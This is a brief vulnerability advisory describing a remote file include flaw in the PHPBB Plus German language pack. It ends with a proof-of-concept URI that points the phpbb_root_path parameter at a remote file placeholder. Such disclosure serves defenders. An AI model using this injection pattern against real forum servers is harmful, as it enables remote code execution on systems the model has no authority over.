PHPBB Plus German Language Pack PHPBB_Root_Path Parameter Remote File Include Vulnerability

PHPBB Plus German Language Pack PHPBB_Root_Path Parameter Remote File Include Vulnerability

Attackers can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/language/lang_german/lang_main_album.php?phpbb_root_path=[RFI]?a=